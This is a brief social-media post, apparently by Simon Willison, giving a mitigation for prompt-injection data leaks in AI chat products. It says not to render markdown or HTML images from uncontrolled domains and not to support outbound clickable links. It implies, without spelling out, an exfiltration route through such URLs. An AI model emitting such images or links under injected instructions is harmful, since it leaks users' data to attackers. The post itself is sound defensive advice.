While prompt injection remains unsolved, for this particular issue there is a known mitigation: don't ever support markdown (or HTML) images that load images from domains you do not control! More painful but also necessary: don't support outbound clickable links either

→ View original post on X — @simonw,